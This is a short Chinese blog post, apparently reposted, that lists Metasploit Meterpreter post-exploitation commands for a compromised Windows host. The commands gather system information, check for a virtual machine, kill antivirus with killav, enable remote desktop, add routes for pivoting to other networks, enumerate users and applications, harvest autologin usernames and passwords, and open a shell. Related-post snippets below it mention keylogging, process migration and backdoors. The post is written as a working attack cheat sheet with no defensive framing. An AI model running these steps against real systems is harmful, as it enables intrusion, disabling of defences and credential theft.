meterpreter--收集系统信息

最新推荐文章于 2021-09-23 22:04:16 发布
最新推荐文章于 2021-09-23 22:04:16 发布
阅读量188 收藏
点赞数
原文链接:http://www.cnblogs.com/cz201803/p/10770450.html
版权

一:收集目标机系统信息

sysinfo

二:检查目标机是否运行在虚拟机上

run post/windows/gather/checkvm

三:目标机最近运行时间

idletime

已运行8小时45分钟7秒

 

四:查看目标机渗透成功的用户名

getuid

 

五:关闭安全软件

run post/windows/manage/killav

 

六:开启目标机远程桌面协议(3389)

run post/windows/manage/enable_rdp

 

七:将当前会话转到后台

background

 

八:添加路由(可以借助被攻陷的主机对其它网络攻击)

在meterpreter中需要先background

 

九:查看目标机用户

run post/windows/gather/enum_logged_on_users

 

十:列举目标机应用程序

run post/windows/gather/enum_applications

 

十一:抓取自动登录的用户名和密码

run post/windows/gather/credentials/windows_autologin

 

十二:进入目标机shell

shell

使用exit停止会话并返回meterpreter

 

转载于:https://www.cnblogs.com/cz201803/p/10770450.html

z-pan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python-InsanityFramework生成有效负载和控制远程机器
08-10
2. **远程控制**:通过有效负载,框架允许安全专家远程控制目标机器,执行命令、收集系统信息、记录键盘输入、监控网络流量等。 3. **隐蔽通信**:为了防止检测,Insanity-Framework支持加密通信和隐藏在网络流量中...
Metasploit学习笔记(四)——Meterpreter后渗透之信息搜集
Zichel77的博客
10-07 1211
此时就需要用到扩展插件Espia,使用前要先输入load espia命令加载该插件,然后输入screengrab命令,就可以抓取此时目标机的屏幕截图。在刚获得Meterpreter Shell时,该Shell是极其脆弱和易受攻击的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但攻击渗透后浏览器有。所以第一步就是要移动这个Shell,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。利用前面永恒之蓝的步骤一模一样,就可以进到后渗透的步骤meterpreter,前面的详细步骤参考。
Meterpreter后渗透模块之信息收集
sGanYu
09-23 2135
进程迁移 防止进程被用户关闭,移动shell 1)手动 先使用ps查看目标正在运行的进程 查看当前进程号 meterpreter > getpid Current pid: 1104 从ps查看的运行进程内找出meterpreter的ipd,可以看到,现在的进程为1104,name为svchost.exe,输入migrate 2844迁移至explorer.exe,因为该进程是一个稳定的应用,然后再使用getpid查看新的进程号 meterpreter > mig
meterpreter获取系统信息和键盘记录
天元喜羊羊的博客
04-20 6088
刚下载了BT5,今天就用BT5来测试。 输入ps,图片上面没有显示,不知道为什么。 我在XP上打开了记事本程序,下面再ps一下,就显示notepad.exe了。 在下面的图中,看到notepad的pid是1024,输入命令 migrate 1024 就将回话迁移到notepad上面去了。 然
利用metasploit进行信息收集
MyDriverC
12-17 1359
http://netsecurity.51cto.com/art/201405/439124.htm 在进行信息收集的时候,我们既要全面详细的获取目标的信息,又要尽量隐藏自己不被发现。Metasploit作为一个非常全面的渗透工具,用来收集信息也非常好用。本文会详细的介绍如何利用Metasploit进行信息收集信息收集分为主动和被动两种方式。 被动信息收集
渗透之——Metasploit-Meterpreter Shell信息收集相关的命令
冰河的专栏
01-06 1805
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85944005 PS:以下所有的命令都是在Metasploit-Meterpreter Shell下执行的。 一、进程迁移 1、获取目标机正在运行的进程 ps 2.查看Meterpreter Shell的进程号 getpid 3.将Meterpreter Shell进程绑...
内网渗透测试-提权工具
05-25
PETools是一个收集系统信息和执行提权脚本的集合,而LinEnum是一个详细的Linux系统枚举脚本,可以帮助发现可能的提权路径。 在内网渗透测试中,提权工具的使用通常遵循以下步骤: 1. **信息收集**:首先,使用Nmap...
module_meterpreter:FruityWifi Meterpreter 模块
07-05
5. **系统信息收集**:获取目标系统信息,如操作系统版本、硬件配置等。 6. **键盘记录**:记录受害者键入的字符,获取敏感信息。 7. **屏幕截图**:捕获目标系统的屏幕快照,了解受害者活动。 **FruityWifi的...
[ MSF ] Meterpreter扩展模块命令详解.docx
最新发布
02-11
在网络安全和渗透测试领域,Meterpreter 是一种非常重要的工具,因为它提供了丰富的功能,能够帮助测试者收集信息、控制目标系统、执行命令、窃取数据等。 0x01 初识 Meterpreter Meterpreter 是由 Rapid7 开发的 ...
metasploit-framework-master.zip
09-08
1. **信息收集**:使用Metasploit的扫描模块,如端口扫描和漏洞扫描,收集目标网络和系统的详细信息。 2. **漏洞识别**:基于收集到的信息,选择合适的exploit模块,针对发现的漏洞进行攻击。 3. **payload配置**...
后渗透之meterpreter使用攻略
钻石
01-06 8347
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
Metasploit(一)--Meterpreter的命令速查表
weixin_34167819的博客
08-27 845
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
metasploit获取系统信息
天元喜羊羊的博客
04-27 1810
meterpreter > run scraper [*] New session on 192.168.1.142:445... [*] Gathering basic system information... [*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: O
手把手教你如何利用Meterpreter渗透Windows系统
weixin_34384557的博客
11-30 683
在这篇文章中,我们将跟大家介绍如何使用Meterpreter收集目标Windows系统中的信息,获取用户凭证,创建我们自己的账号,启用远程桌面,进行屏幕截图,以及获取用户键盘记录等等。 相关Payload Payload中包含有需要在远程系统中运行的恶意代码,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这...
小白日记6:kali渗透测试之被动信息收集(五)-Recon-ng
ZiXuanFY的博客
09-08 6506
Recon-ng Recon-NG是由python编写的一个开源的Web侦查(信息收集)框架。Recon-ng框架是一个全特性的工具,使用它可以自动的收集信息和网络侦查。其命令格式与Metasploit!默认集成数据库,可把查询结果结构化存储在其中,有报告模块,把结果导出为报告。 点击打开链接 启动Recon-NG框架 [recon-ng][default] >提示符表示启动成
Meterpreter命令详解
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
metasploit 教程之信息收集
weixin_30294021的博客
03-05 149
信息收集 信息收集范围很大,可以从不同层面,不同维度进行信息收集. 系统补丁 我们知道目标机器缺少什么补丁就意味着存在与其对应的漏洞.我们可以利用这些漏洞来达到我们渗透攻击的目的. # 使用的模块 use post/windows/gether/enum_patches# 这个模块是基于session来指定的 不是通过rhosts Sql Server # Mssql 扫...
Metasploit学习笔记(一) 信息收集
xiaoxuetu_的博客
07-29 463
一、渗透测试中信息收集的主要任务 确定渗透测试目标的范围。 通过信息收集,发现渗透目标的安全漏洞。 二、通过DNS挖掘目标网络信息 whois域名信息查询。进行whois查询时去掉www、ftp等前缀。 nslookup:查询指定域名所对应的IP地址。一般为保存在DNS解析服务器保存在Cache中的非权威解答。 dig:功能同nslookup,一般为权威解答。语法如下: 后面再加上A

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值